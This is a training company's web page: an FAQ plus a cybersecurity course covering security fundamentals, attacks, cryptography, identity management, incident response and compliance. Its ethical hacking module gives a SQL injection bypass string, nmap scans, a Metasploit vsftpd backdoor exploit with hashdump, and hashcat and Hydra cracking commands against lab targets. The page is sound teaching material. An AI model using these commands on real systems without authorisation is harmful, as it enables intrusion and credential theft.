What services does XIopt offer?

XIopt offers outsourcing, recruitment and training services across 8 pillars: Finance, Technology, Marketing, Project & Product Management, HR & People Operations, Cybersecurity, Data Science & AI/ML, and Automation.

Where is XIopt based?

XIopt operates globally, serving clients across the UK, USA, Canada, Australia, New Zealand, UAE, Singapore, Ireland, South Africa and beyond. All services are delivered remotely.

Does XIopt offer online training courses?

Yes, XIopt offers practical online training courses in Cybersecurity, Data Science & AI/ML, and Automation, with more courses coming soon. Students gain real project experience.

How does XIopt recruitment work?

XIopt recruits specialist talent across all 8 business pillars. Each candidate is screened by a subject-matter expert in their field before being presented to clients.

Does XIopt work with clients in the UK?

Yes, XIopt serves clients across the UK, providing outsourcing, recruitment and training services. All services are delivered remotely with no geographic restrictions.

Can businesses in Australia and New Zealand use XIopt?

Yes, XIopt works with businesses across Australia and New Zealand, offering outsourcing, remote recruitment and online training courses.

Does XIopt offer remote outsourcing services?

Yes, all XIopt services are delivered remotely. Whether you need outsourced Finance, Technology, Cybersecurity, Marketing or HR functions, XIopt provides fully remote delivery to clients worldwide.

What makes XIopt different from other outsourcing companies?

XIopt covers 8 business pillars under one roof — outsourcing, recruitment AND training — meaning clients can outsource a function, hire talent for it, or train their existing team, all through one partner.

Is XIopt training suitable for students and graduates?

Yes. XIopt training programmes are designed for students, graduates and career changers who want real practical experience — not just theory. You work on real projects and leave with a portfolio you can show employers.

Does XIopt offer work experience or internship programmes?

Yes. XIopt's Practical Experience Training programmes provide hands-on work experience across Cybersecurity, Data Science & AI, Finance, Technology, Automation, Marketing, HR and PM. Ideal for students and graduates seeking real-world experience.

I was made redundant. Can XIopt help me retrain and get back to work?

Absolutely. XIopt courses are specifically designed to help professionals who have been made redundant or laid off to retrain, upskill and re-enter the workforce. Our practical training gives you job-ready skills in high-demand fields like Cybersecurity, Data Science and AI.

What is the best course for a career change into tech?

XIopt offers practical bootcamps in Cybersecurity, Data Science & AI/ML, and Automation — the three fastest-growing areas in tech. Each programme focuses on real projects so you build a portfolio alongside your skills. No prior experience required for most programmes.

XIopt - Outsource, Recruit, Train & Innovate | Cybersecurity, Data Science & AI, Finance, Tech, Automation

🔒 XIopt Practical Experience Training

Cybersecurity
Mastery Course

Comprehensive material + hands-on real labs covering everything from core concepts to ethical hacking, incident response and compliance. CompTIA Security+ aligned.

8

Core modules

8

Practical labs

120+

Quiz questions

6mo

Programme length

What you'll master

🛡️ Security Foundations

CIA Triad, security controls, frameworks (NIST, ISO 27001), zero trust

⚠️ Threats & Attacks

Malware, social engineering, network attacks, web app vulnerabilities

🌐 Network Security

TCP/IP, firewalls, IDS/IPS, VPNs, wireless security, DNS/email

🔑 Cryptography

Symmetric/asymmetric encryption, hashing, PKI, TLS, certificates

🪪 IAM

Authentication, MFA, SSO, RBAC, PAM, Active Directory, Kerberos

🧪 Ethical Hacking

Recon, Nmap, Metasploit, Burp Suite, exploitation, pentest reports

📡 SOC & IR

SIEM, log analysis, incident response lifecycle, digital forensics

📋 GRC

Risk management, ALE/SLE/ARO, GDPR, HIPAA, PCI-DSS, BCP/DRP

🏗️ 8 Real Labs

Hands-on with Kali, Nmap, Wireshark, DVWA, Metasploit, pfSense

💡

How to use this course

Work through each module in order. Complete the quiz at the end of each module before moving on. Do every lab — the practical work is where real learning happens. All labs use free tools.

Module 1 — Foundations

CIA Triad & Core Concepts

The CIA Triad is the foundation of all cybersecurity. Every security decision — every control, every policy, every tool — exists to protect one or more of these three properties.

The CIA Triad

🔵 Confidentiality

Ensuring information is accessible only to those authorised to access it. Attacks: eavesdropping, data breaches, credential theft. Controls: encryption, access control, MFA.

🟢 Integrity

Ensuring data is accurate and has not been tampered with. Attacks: man-in-the-middle, SQL injection, file tampering. Controls: hashing, digital signatures, checksums.

🟡 Availability

Ensuring systems and data are accessible when needed. Attacks: DDoS, ransomware, hardware failure. Controls: redundancy, backups, failover, DDoS protection.

📌

Exam tip

When a question asks "which property is affected?" — think: was data exposed? (Confidentiality). Was data changed? (Integrity). Was a service unavailable? (Availability).

AAA Framework

AAA (Authentication, Authorisation, Accounting) is the framework for controlling access to systems.

Component	What it does	Example
Authentication	Proves who you are	Password, fingerprint, smart card
Authorisation	Determines what you can access	RBAC roles, ACLs, file permissions
Accounting	Tracks what you did	Audit logs, SIEM, session recording

AAA protocols include RADIUS (Remote Access Dial-In User Service) and TACACS+ (Terminal Access Controller Access-Control System). TACACS+ encrypts the entire payload; RADIUS only encrypts the password.

Zero Trust Architecture

Zero Trust operates on the principle: "Never trust, always verify." No user or device is trusted by default — even inside the network perimeter.

Identity verification: Every access request is authenticated and authorised regardless of location
Microsegmentation: Network is divided into small zones; breach of one zone doesn't compromise others
Least privilege: Users get the minimum access needed for their role, nothing more
Continuous monitoring: All traffic is logged and analysed in real time

🏗️

Real project connection

In your practical project you will map a fictional organisation's security posture against Zero Trust principles — identifying gaps and recommending controls. This is exactly the kind of work a security consultant produces for clients.

Key Security Concepts

Threat

Any potential danger to an asset — a hacker, insider, natural disaster, or software bug

Vulnerability

A weakness that can be exploited — unpatched software, misconfiguration, weak password

Risk

The likelihood and impact of a threat exploiting a vulnerability: Risk = Threat × Vulnerability × Impact

Exploit

A piece of code or technique that takes advantage of a vulnerability to cause harm

Attack Surface

The total set of entry points an attacker could use — every open port, API, employee device

Defence in Depth

Layering multiple security controls so that if one fails, others still protect the asset

Module 1 — Foundations

Security Controls & Frameworks

Types of Security Controls

Category	Purpose	Examples
Preventive	Stop attacks before they happen	Firewalls, MFA, encryption, locked doors
Detective	Identify attacks in progress or after the fact	IDS, SIEM, audit logs, cameras
Corrective	Restore systems after an incident	Backups, patch management, IR plans
Deterrent	Discourage attackers	Warning banners, CCTV signs, legal notices
Compensating	Alternative when primary control isn't feasible	Manual review instead of automated scanning
Physical	Protect physical access to assets	Badges, biometrics, mantrap doors

Major Security Frameworks

NIST Cybersecurity Framework (CSF)

Five core functions — Identify, Protect, Detect, Respond, Recover. Used widely in US government and private sector. Version 2.0 (2024) adds Govern as a sixth function.

Identify: Asset management, risk assessment, governance
Protect: Access control, data security, training, maintenance
Detect: Anomaly detection, continuous monitoring, log analysis
Respond: Incident response plan, communications, mitigation
Recover: Recovery planning, improvements, communications

ISO/IEC 27001

International standard for Information Security Management Systems (ISMS). Organisations can be certified against ISO 27001. Covers 114 controls across 14 domains including access control, cryptography, physical security and supplier relationships.

CIS Controls (v8)

18 prioritised security controls. The first 6 ("IG1") are considered essential for every organisation. Highly practical and implementation-focused. Common starting point for SMEs.

Deception Technologies

Honeypot

A fake system designed to attract and detect attackers. Any connection to a honeypot is inherently suspicious — legitimate users wouldn't be there.

Honeynet

A network of honeypots simulating a full environment. Used to study attacker behaviour and TTPs (Tactics, Techniques, Procedures).

Honeyfile

A fake file left in accessible locations. If accessed or exfiltrated, triggers an alert indicating an insider threat or breach.

Honeytoken

Fake credentials, API keys or data embedded in systems. If used anywhere, immediately flags a compromise.

Module 1 — Foundations

Quiz — Security Foundations

10 questions. Click an answer to reveal the explanation.

Question 1 of 10

A hospital's patient records become encrypted by ransomware and are inaccessible to doctors. Which CIA property is PRIMARILY affected?

Question 2 of 10

An attacker intercepts communication between a user and a bank, and silently modifies the transaction amount. Which CIA property is violated?

Question 3 of 10

Which component of AAA is responsible for tracking what an authenticated user did after logging in?

Question 4 of 10

Zero Trust architecture is BEST described as:

Question 5 of 10

A security team places a server with fake sensitive data on the network. Any access to it triggers an immediate alert. This is BEST described as:

Question 6 of 10

Which security control type is a firewall PRIMARILY classified as?

Question 7 of 10

The NIST Cybersecurity Framework (CSF) core function that involves developing and implementing appropriate safeguards to ensure delivery of critical services is:

Question 8 of 10

An organisation cannot implement automated patch management due to system constraints. They instead implement a monthly manual review process. This is an example of which control type?

Question 9 of 10

Which of the following BEST describes "defence in depth"?

Question 10 of 10

TACACS+ differs from RADIUS primarily because:

0/10

Module 1 Quiz Complete

Module 2 — Threats & Attacks

Malware & Social Engineering

Malware Types

Type	How it works	Example / Key fact
Virus	Attaches to legitimate files; spreads when file is executed	Requires human action to spread; self-replicating within files
Worm	Self-replicates across networks without user action	WannaCry (2017) — spread via EternalBlue SMB vulnerability
Trojan	Disguised as legitimate software; creates backdoor	Emotet — delivered via phishing emails as fake invoices
Ransomware	Encrypts files and demands payment for decryption key	LockBit, REvil — typical ransom $10k–$5M+
Rootkit	Hides itself and other malware at OS/kernel level	Extremely hard to detect; may persist after reboots
Keylogger	Records keystrokes to steal credentials	Can be hardware (USB device) or software
Spyware	Monitors user activity without consent	Collects browsing, credentials, screenshots
Adware	Displays unwanted ads; often bundles spyware	Lowest severity but often a gateway to worse malware
Botnet	Network of infected machines (bots) controlled remotely	Used for DDoS, spam campaigns, credential stuffing
RAT	Remote Access Trojan — full remote control of victim machine	DarkComet, njRAT — attacker has keyboard/camera access

Social Engineering Attacks

⚠️

Key fact

Over 90% of successful cyberattacks begin with social engineering. Technical controls cannot fully protect against human manipulation — training is essential.

Phishing

Mass emails impersonating trusted brands. Goal: steal credentials or deliver malware. Uses urgency ("Your account will be suspended").

Spear Phishing

Targeted phishing using personal details about the victim (name, role, colleagues). Much higher success rate than generic phishing.

Whaling

Spear phishing targeting executives (CEO, CFO). Often aims at wire transfers or sensitive data access.

Vishing

Voice phishing — attacker calls the victim pretending to be IT support, bank, or government official.

Smishing

SMS phishing — fake text messages with malicious links. Exploits trust in SMS vs email.

Pretexting

Creating a fabricated scenario to extract information. E.g. posing as an auditor asking for access credentials.

Tailgating / Piggybacking

Physical: following an authorised person through a secure door without badging in.

Baiting

Leaving infected USB drives in public places hoping someone will plug them in. Exploits curiosity.

Module 2 — Threats & Attacks

Network & Web Application Attacks

Network Attacks

Attack	How it works	Defence
Man-in-the-Middle (MITM)	Attacker intercepts/modifies traffic between two parties	TLS/HTTPS, certificate pinning, VPN
ARP Spoofing	Sends fake ARP replies linking attacker's MAC to victim's IP — enables MITM on local network	Dynamic ARP Inspection (DAI), static ARP entries
DNS Poisoning	Injects false DNS records to redirect users to attacker-controlled sites	DNSSEC, DNS over HTTPS (DoH)
DDoS — Volumetric	Floods bandwidth with traffic (UDP floods, ICMP floods)	CDN scrubbing, upstream filtering, rate limiting
DDoS — Protocol	Exploits Layer 3/4 (SYN flood exhausts connection tables)	SYN cookies, firewall rate limiting
DDoS — Application	HTTP floods targeting web app layer (Layer 7)	WAF, CAPTCHA, behaviour-based blocking
Replay Attack	Captures valid authentication token and replays it	Timestamps, nonces, session tokens
Smurf Attack	Sends ICMP requests with spoofed source IP to broadcast address — victim flooded with replies	Disable directed broadcast on routers

Web Application Attacks (OWASP Top 10)

SQL Injection

Attacker injects SQL code into input fields, manipulating the database query.

-- Example: Login bypass

-- Normal query:
SELECT * FROM users WHERE username='alice' AND password='secret';

-- Injected input: ' OR '1'='1
SELECT * FROM users WHERE username='' OR '1'='1' AND password='';
-- Returns all users — authentication bypassed

Defence: Parameterised queries / prepared statements, input validation, WAF, least privilege DB accounts.

Cross-Site Scripting (XSS)

Attacker injects malicious JavaScript into web pages viewed by other users.

Stored XSS: Script saved in the database (e.g. in a comment), executes for every visitor
Reflected XSS: Script in the URL, only affects users who click the malicious link
DOM XSS: Script manipulates the page's DOM client-side

Defence: Output encoding, Content Security Policy (CSP), input validation, HttpOnly cookies.

Cross-Site Request Forgery (CSRF)

Tricks an authenticated user's browser into making unintended requests to a site where they're logged in.

Example: User logged into bank. Attacker's site triggers a hidden form POST to transfer funds. Bank server receives a legitimate-looking request with the user's session cookie.

Defence: CSRF tokens, SameSite cookie attribute, re-authentication for sensitive actions.

Other Key Web Vulnerabilities

Vulnerability	Description	Defence
Buffer Overflow	Writing more data than a buffer can hold, overwriting memory	Input validation, ASLR, DEP, safe coding
Directory Traversal	Using ../ to access files outside the web root	Input sanitisation, chroot jail
IDOR	Insecure Direct Object Reference — change ID in URL to access another user's data	Authorisation checks on every request
SSRF	Server-Side Request Forgery — tricks server into making requests to internal resources	Whitelist allowed URLs, block internal IPs

Module 2 — Threats & Attacks

Quiz — Threats & Attacks

10 questions. Click an answer to reveal the explanation.

Question 1 of 10

A malware sample self-replicates across a network without requiring any user interaction. What type of malware is this?

Question 2 of 10

An attacker targets the CFO of a large company with a personalised email that references their recent conference attendance and names their direct reports. This is BEST described as:

Question 3 of 10

Which attack involves an attacker sending fake ARP replies to associate their MAC address with a legitimate IP address on a local network?

Question 4 of 10

A developer enters the following into a login field: ' OR '1'='1. They are able to log in without a valid password. What vulnerability does this demonstrate?

Question 5 of 10

An attacker stores malicious JavaScript in a web application's comments section. Every user who views the comments page has their session cookies stolen. This is:

Question 6 of 10

The BEST defence against SQL injection is:

Question 7 of 10

A volumetric DDoS attack is primarily targeting which layer of the OSI model?

Question 8 of 10

An attacker captures an authentication token from a valid session and retransmits it to gain unauthorised access. This is a:

Question 9 of 10

Which malware type is specifically designed to hide its presence and other malware at the operating system or kernel level?

Question 10 of 10

A user changes the ID parameter in a URL from "account?id=1001" to "account?id=1002" and successfully views another user's account. This is:

0/10

Module 2 Quiz Complete

Module 3 — Network Security

TCP/IP, Firewalls & IDS/IPS

TCP/IP Fundamentals

Understanding TCP/IP is essential for network security analysis. The 3-way handshake (SYN → SYN-ACK → ACK) establishes TCP connections. Attackers exploit this in SYN flood attacks by sending many SYN packets without completing the handshake, exhausting the server's connection table.

Protocol	Port	Security notes
HTTP	80	Unencrypted — never use for sensitive data
HTTPS	443	TLS encrypted — required for all web apps
SSH	22	Encrypted remote access — replace Telnet (23)
FTP	20/21	Unencrypted — use SFTP (22) or FTPS (990)
DNS	53	UDP/TCP — can be tunnelled for exfiltration
SMTP	25	Email sending — use 587/465 with TLS for clients
RDP	3389	High-value attack target — should never be open to internet
SMB	445	Used by WannaCry (EternalBlue) — should be blocked at perimeter

Firewalls

Packet Filtering

Inspects individual packets against rules (IP, port, protocol). Fast but no stateful context. Layer 3–4.

Stateful Inspection

Tracks connection state — knows if a packet is part of an established session. More intelligent than packet filtering.

Next-Gen Firewall (NGFW)

Deep packet inspection, application awareness, user identity, IPS, SSL inspection. Layer 7.

WAF (Web App Firewall)

Specifically protects web applications against OWASP Top 10 attacks — SQL injection, XSS, CSRF etc.

IDS vs IPS

Feature	IDS	IPS
Action	Detects and alerts	Detects, alerts AND blocks
Position	Out-of-band (passive, mirror port)	Inline (traffic flows through it)
Risk	False negatives — misses attacks	False positives — may block legitimate traffic
Detection	Signature-based or anomaly-based	Same detection, adds blocking capability

📌

Exam tip

NIDS = Network IDS (monitors network traffic). HIDS = Host IDS (monitors a single host's logs/files). NIPS = Network IPS (inline blocking).

Module 3 — Network Security

VPNs, DNS & Email Security

VPN Types

Type	Use case	Protocol
Remote Access VPN	Individual users connecting to corporate network from anywhere	SSL/TLS, IPSec
Site-to-Site VPN	Connecting two office networks permanently over the internet	IPSec (IKEv2)
Split Tunnelling	Only corporate traffic goes through VPN; internet traffic goes direct — less secure but faster	Configurable
Full Tunnel	All traffic routes through VPN — more secure, enables monitoring	IPSec / SSL

DNS Security

DNSSEC: Cryptographically signs DNS records to prevent tampering
DNS over HTTPS (DoH): Encrypts DNS queries — prevents ISP/attacker from seeing what you're looking up
DNS Sinkhole: Redirects malicious domain queries to a controlled IP — used to neutralise malware C2 communications
DNS Tunnelling: Attackers encode data in DNS queries to exfiltrate data or establish C2 channel — often bypasses firewalls

Email Security — SPF, DKIM, DMARC

SPF (Sender Policy Framework)

DNS TXT record listing authorised mail servers for a domain. Receiving server checks if the sending server's IP is on the list. Prevents unauthorised servers from sending as your domain.

DKIM (DomainKeys Identified Mail)

Adds a cryptographic signature to outgoing emails. Receiving server verifies signature using public key in DNS. Ensures email content wasn't modified in transit.

DMARC (Domain-based Message Auth)

Policy that tells receiving servers what to do when SPF/DKIM fail — reject, quarantine, or none. Also provides reporting on failed attempts. Builds on SPF and DKIM.

S/MIME

End-to-end email encryption and signing. Unlike SPF/DKIM/DMARC (server-level), S/MIME encrypts the message body using the recipient's public key.

Module 3 — Network Security

Quiz — Network Security

5 key questions.

Q1

Which email security protocol cryptographically signs outgoing emails to ensure content integrity?

Q2

An IPS differs from an IDS primarily because it:

Q3

Split tunnelling on a VPN is considered a security risk because:

Q4

DNS tunnelling is used by attackers to:

Q5

A Next-Generation Firewall (NGFW) provides capabilities beyond a traditional stateful firewall by adding:

0/5

Module 3 Quiz Complete

Module 4 — Cryptography

Encryption & Hashing

Symmetric vs Asymmetric Encryption

Feature	Symmetric	Asymmetric
Keys	One shared secret key	Public key + Private key pair
Speed	Fast — suitable for bulk data	Slow — used for key exchange / signatures
Key problem	How to securely share the key?	Solved — public key can be shared openly
Algorithms	AES (128/256), 3DES, ChaCha20	RSA, ECC, Diffie-Hellman, ElGamal
Use cases	File encryption, disk encryption, VPN data	TLS handshake, digital signatures, key exchange

🔑

How TLS uses both

TLS uses asymmetric encryption to securely exchange a symmetric session key. Then all data is encrypted with that faster symmetric key. Best of both worlds.

Hashing

A hash function takes any input and produces a fixed-length output (hash/digest). It is one-way — you cannot reverse a hash to get the original input. Used for integrity verification and password storage.

Algorithm	Output size	Status
MD5	128-bit	❌ Broken — collision attacks found. Do not use.
SHA-1	160-bit	❌ Deprecated — collisions demonstrated (SHAttered, 2017)
SHA-256	256-bit	✅ Current standard — widely used
SHA-3	224–512-bit	✅ Newest NIST standard — alternative architecture to SHA-2
bcrypt / Argon2	Variable	✅ Designed for password hashing — deliberately slow

Cryptographic Attacks

Brute Force

Try every possible key or password until one works. Defence: long keys, account lockout, rate limiting.

Rainbow Table

Pre-computed table of hash values for common passwords. Defence: salting (adding random data before hashing).

Birthday Attack

Exploits probability — find two inputs with the same hash (collision). Reason MD5/SHA-1 are deprecated.

Downgrade Attack

Forces use of older, weaker protocol version. Example: POODLE forced SSL 3.0. Defence: disable legacy protocol versions.

Module 4 — Cryptography

PKI, Certificates & TLS

Public Key Infrastructure (PKI)

PKI is the system that manages digital certificates and public-key encryption. It establishes trust between parties who have never met.

Certificate Authority (CA)

Trusted entity that issues and signs digital certificates. Root CAs (DigiCert, Let's Encrypt, Comodo) are pre-installed in browsers/OS.

Digital Certificate

Contains: subject's public key, identity info, CA signature, validity period. Proves "this public key belongs to this entity."

CRL (Certificate Revocation List)

List of revoked certificates published by CA. Checked before trusting a certificate. Slower than OCSP.

OCSP (Online Certificate Status Protocol)

Real-time certificate validity check — faster than downloading a full CRL. Modern browsers use OCSP stapling.

Certificate Types

Type	Validation level	Use case
DV (Domain Validation)	Proves control of domain only	Basic HTTPS — Let's Encrypt, personal sites
OV (Organisation Validation)	Verifies organisation identity	Business websites
EV (Extended Validation)	Rigorous company verification	Banking, e-commerce — highest trust
Wildcard	Covers *.domain.com	All subdomains with one certificate
SAN (Subject Alt Name)	Multiple domains in one cert	Organisations with multiple domains

TLS Handshake (How HTTPS Works)

Client Hello: Browser sends supported TLS versions and cipher suites
Server Hello: Server selects cipher suite, sends its certificate
Certificate Verification: Browser verifies the certificate against trusted CAs
Key Exchange: Both parties use asymmetric crypto to agree on a symmetric session key
Session Established: All data encrypted with the symmetric session key (AES)

Module 4 — Cryptography

Quiz — Cryptography

Q1

Which hashing algorithm is currently considered the most appropriate for general use?

Q2

Rainbow table attacks against password hashes are BEST mitigated by:

Q3

During a TLS handshake, what is the purpose of asymmetric encryption?

Q4

An EV (Extended Validation) certificate differs from a DV (Domain Validation) certificate because:

0/4

Module 4 Quiz Complete

Module 5 — Identity & Access Management

Authentication & MFA

Authentication Factors

Factor	Description	Examples
Something you know	Knowledge-based	Password, PIN, security questions
Something you have	Possession-based	Smart card, TOTP app, hardware token (YubiKey)
Something you are	Biometric	Fingerprint, facial recognition, iris scan
Somewhere you are	Location-based	GPS location, IP geolocation, network location
Something you do	Behavioural	Typing pattern, mouse movement, gait analysis

📌

MFA definition

MFA requires TWO OR MORE factors from DIFFERENT categories. Two passwords = not MFA. Password + OTP = MFA. The factors must be from different categories.

SSO Protocols

SAML 2.0

XML-based standard for enterprise SSO. Used for web browser SSO. Identity Provider (IdP) issues assertions to Service Providers (SP). Common in corporate environments (Okta, ADFS).

OAuth 2.0

Authorisation framework — allows third-party apps to access resources without sharing passwords. "Login with Google" uses OAuth. Grants access tokens.

OpenID Connect

Authentication layer built on OAuth 2.0. Adds identity (who you are) to OAuth (what you can access). Issues ID tokens (JWT).

Kerberos

Ticket-based authentication used in Active Directory. Uses a KDC (Key Distribution Centre) to issue TGTs and service tickets. Vulnerable to pass-the-ticket, golden ticket attacks.

Module 5 — Identity & Access Management

Access Control Models

Model	How it works	Who controls access?
DAC — Discretionary	Resource owner decides who gets access. Flexible but harder to manage at scale.	Individual resource owners
MAC — Mandatory	Labels applied to subjects and objects (Top Secret, Secret, etc.). OS enforces — users cannot override. Used in government/military.	System / Security policy
RBAC — Role-Based	Access based on job role. User inherits permissions of their role. Most common in enterprise environments.	Administrators (via roles)
ABAC — Attribute-Based	Access based on attributes of user, resource, environment (time, location, device health). Most flexible and granular.	Policy engine
Rule-Based	Access determined by rules (firewall ACLs are rule-based). Conditions must be met.	Administrators (via rules)

Privileged Access Management (PAM)

Least privilege: Grant only the minimum access needed for the job — nothing more
Just-in-time access: Elevate privileges temporarily when needed, then revoke
Credential vaulting: Store privileged credentials in a secure vault (CyberArk, HashiCorp)
Session recording: Record all privileged sessions for audit and forensics
Separation of duties: No single person should have end-to-end control of a sensitive process

Module 5 — IAM

Quiz — Identity & Access Management

Q1

A user provides their password AND receives a push notification to their phone to approve login. This is BEST described as:

Q2

In RBAC, access is determined by:

Q3

Which principle ensures that no single person has complete control over a sensitive financial transaction process?

0/3

Module 5 Quiz Complete

Module 6 — Ethical Hacking

Reconnaissance & Scanning

Penetration Testing Methodology

Planning & Scoping: Define scope, rules of engagement, legal authorisation (get it in writing)
Reconnaissance: Passive (OSINT, no direct contact) and Active (direct probing)
Scanning & Enumeration: Port scanning, service detection, vulnerability scanning
Exploitation: Use discovered vulnerabilities to gain access
Post-Exploitation: Privilege escalation, lateral movement, persistence
Reporting: Document findings, evidence, risk ratings (CVSS), remediation recommendations

OSINT Tools

Shodan

Search engine for internet-connected devices. Shows open ports, banners, vulnerabilities on publicly accessible systems. Passive recon — never touches target directly.

theHarvester

Gathers emails, subdomains, hosts, employee names from public sources (Google, LinkedIn, DNS). Pre-installed on Kali Linux.

Google Dorking

Using advanced Google operators to find sensitive information: site:target.com filetype:pdf, intitle:"index of", inurl:admin

Maltego

Graphical link analysis tool for OSINT. Maps relationships between people, organisations, domains, IPs.

Nmap — Key Scan Types

nmap scan types

# Host discovery — ping sweep
nmap -sn 192.168.1.0/24

# Stealth SYN scan (most common)
nmap -sS -p 1-1000 target_ip

# Service version + OS detection
nmap -sV -O target_ip

# Aggressive scan (all features)
nmap -A target_ip

# Vulnerability scripts
nmap --script vuln target_ip

# UDP scan (slower but important)
nmap -sU -p 53,67,123,161 target_ip

Module 6 — Ethical Hacking

Exploitation & Post-Exploitation

Metasploit Framework

metasploit basics

# Launch Metasploit
msfconsole

# Search for an exploit
search vsftpd 2.3.4

# Use an exploit
use exploit/unix/ftp/vsftpd_234_backdoor

# Show and set options
show options
set RHOSTS 192.168.1.100

# Run the exploit
run

# Common Meterpreter commands (post-exploitation)
sysinfo          # System information
getuid           # Current user
hashdump         # Dump password hashes
upload / download  # File transfer
shell            # Drop into system shell

Privilege Escalation

Linux: SUID binaries, sudo misconfigs, cron job exploitation, kernel exploits
Windows: Unquoted service paths, weak registry permissions, token impersonation, AlwaysInstallElevated
Tools: LinPEAS / WinPEAS (automated enumeration), GTFOBins (Linux SUID), PrivescCheck (Windows)

Password Attacks

hashcat — password cracking

# Crack MD5 hash with wordlist
hashcat -m 0 -a 0 hash.txt rockyou.txt

# Crack NTLM (Windows) hash
hashcat -m 1000 hash.txt rockyou.txt

# Brute force 4-digit PIN
hashcat -m 0 -a 3 hash.txt ?d?d?d?d

# Hydra — online brute force (SSH)
hydra -l admin -P rockyou.txt ssh://192.168.1.100

Module 6 — Ethical Hacking

Quiz — Ethical Hacking

Q1

Which phase of a penetration test involves gathering information without directly contacting the target?

Q2

The Metasploit command "hashdump" is used during which phase of a penetration test?

Q3

Shodan is best described as:

0/3

Module 6 Quiz Complete

Module 7 — SOC & Incident Response

SIEM, Logging & Monitoring

What is a SIEM?

A Security Information and Event Management (SIEM) system collects, normalises, correlates, and analyses log data from across the organisation to detect threats in real time.

Log Collection

Aggregates logs from firewalls, servers, endpoints, cloud services, applications. Examples: Splunk, QRadar, Elastic SIEM, Microsoft Sentinel.

Correlation Rules

Logic that triggers alerts when specific patterns occur across multiple log sources. E.g. 5 failed logins followed by a success = brute force alert.

Normalisation

Converting logs from different formats (Windows, Linux, network devices) into a common schema for analysis.

Dashboards & Alerts

Visual representation of security posture. Analysts monitor dashboards and respond to priority alerts (P1–P4).

Key Windows Event IDs

Event ID	Meaning	Why it matters
4624	Successful login	Baseline; alert if from unusual location/time
4625	Failed login	Multiple failures = brute force indicator
4648	Login with explicit credentials	Pass-the-hash / lateral movement indicator
4672	Special privileges assigned	Admin login — monitor closely
4688	New process created	Malware execution, suspicious child processes
4698	Scheduled task created	Common persistence mechanism
4720	User account created	Backdoor account creation
7045	New service installed	Malware/rootkit installation indicator

Module 7 — SOC & Incident Response

Incident Response & Digital Forensics

IR Lifecycle (NIST SP 800-61)

Preparation: IR plan, playbooks, tools, team training, communication plan
Detection & Analysis: Identify the incident, determine scope and severity, assign priority
Containment: Short-term (isolate system) and long-term (patch, rebuild) containment
Eradication: Remove malware, close attack vectors, patch vulnerabilities
Recovery: Restore systems, verify no residual compromise, return to normal operations
Lessons Learned: Post-incident review, update IR plan, training improvements

Digital Forensics Principles

Order of Volatility

Collect most volatile evidence first: CPU registers/cache → RAM → Network connections → Running processes → Disk → Optical media → Remote logs

Chain of Custody

Documentation tracking who collected, handled, and accessed evidence. Essential for evidence to be admissible in court.

Disk Imaging

Create a forensic bit-for-bit copy of the drive. Use write blockers. Verify with hash (MD5/SHA-256). Work from the copy, not the original.

Memory Forensics

Capture and analyse RAM dump — reveals running processes, decrypted data, network connections, credentials. Tools: Volatility, Rekall.

Module 7 — SOC & IR

Quiz — SOC & Incident Response

Q1

During a digital forensics investigation, what should be collected FIRST according to the order of volatility?

Q2

Which NIST IR phase involves removing the malware, patching the exploited vulnerability, and eliminating attacker persistence mechanisms?

Q3

Windows Event ID 4625 repeated 50 times in 2 minutes from the same source IP BEST indicates:

0/3

Module 7 Quiz Complete

Module 8 — GRC

Risk Management & Compliance

Risk Calculations

ALE — Annual Loss Expectancy

ALE = SLE × ARO

SLE (Single Loss Expectancy): Cost of one occurrence = Asset Value × Exposure Factor
ARO (Annual Rate of Occurrence): How many times per year the threat is expected (0.5 = once every 2 years)

🧮

Worked example

Asset value: $500,000. Exposure factor: 40%. ARO: 0.5 (every 2 years).
SLE = $500,000 × 0.4 = $200,000
ALE = $200,000 × 0.5 = $100,000

Risk Treatment Options

Option	Description	Example
Accept	Risk is tolerated — cost of control exceeds risk	Accept low-value system being offline occasionally
Transfer	Move risk to another party	Cyber insurance, outsourcing
Avoid	Eliminate the risk by not doing the activity	Not storing credit card data at all
Mitigate	Reduce likelihood or impact with controls	Patching systems, enabling MFA

Key Compliance Frameworks

Framework	Covers	Who must comply
GDPR	Personal data of EU citizens	Any org processing EU citizen data
HIPAA	US healthcare data (PHI)	Healthcare providers, insurers, business associates
PCI-DSS	Payment card data	Any org storing/processing/transmitting card data
SOX	Financial reporting accuracy	US public companies
ISO 27001	ISMS — information security management	Voluntary but widely adopted; certifiable

Module 8 — GRC

Policies, BCP & Disaster Recovery

Key Security Policies

Acceptable Use Policy (AUP)

Defines permitted and prohibited uses of organisational IT systems. All employees sign on joining.

Data Classification

Labelling data by sensitivity: Public, Internal, Confidential, Top Secret. Controls applied based on classification.

Change Management

Formal process to approve, test, and document changes to systems. Prevents outages from untested changes.

Password Policy

Minimum length (12+), complexity, no reuse, MFA requirement. NIST 2024 guidance: length over complexity, check against breach databases.

Business Continuity & Disaster Recovery

BCP (Business Continuity Plan)

How the organisation continues critical operations during a disruption. Broader than IT — covers people, processes, facilities.

DRP (Disaster Recovery Plan)

Specifically how IT systems are restored after a disaster. Subset of BCP. Includes backups, failover procedures, recovery steps.

RTO (Recovery Time Objective)

Maximum acceptable time to restore a system after failure. "We must be back online within 4 hours."

RPO (Recovery Point Objective)

Maximum acceptable data loss measured in time. "We can tolerate losing up to 1 hour of data." → Backups every hour.

Backup Strategies

Type	What it backs up	Restore time
Full backup	Everything	Fastest restore — single backup set
Incremental	Changes since last backup (any type)	Slowest restore — need full + all incrementals
Differential	Changes since last FULL backup	Medium — need full + latest differential only

💡

3-2-1 backup rule

Keep 3 copies of data, on 2 different media types, with 1 copy offsite (or in cloud). Essential for ransomware protection.

Module 8 — GRC

Quiz — GRC

Q1

An asset is worth $1,000,000. The exposure factor for a flood event is 30%. Floods occur on average once every 5 years. What is the ALE?

Q2

An organisation purchases cyber insurance to cover losses from data breaches. This is an example of which risk treatment option?

Q3

An organisation's RPO is 2 hours. This means:

0/3

Module 8 Quiz Complete

Practical Labs

🏗️

Lab 1 — Build Your Home Cyber LabBeginner

Set up an isolated virtual lab environment with Kali Linux and a vulnerable target machine. This is your foundation for every subsequent lab. All software is free.

VirtualBoxKali LinuxMetasploitable2

Objectives

Install VirtualBox hypervisor
Deploy Kali Linux VM
Deploy Metasploitable2 target
Configure isolated networking
Verify connectivity between VMs
Run first Nmap scan

Step-by-step instructions

Download VirtualBox from virtualbox.org (free). Install on your host machine (Windows, Mac or Linux). Enable virtualisation in BIOS if prompted.
Download Kali Linux — go to kali.org/get-kali and download the VirtualBox pre-built image (.ova file). This is faster than a full install. In VirtualBox: File → Import Appliance → select the .ova file.
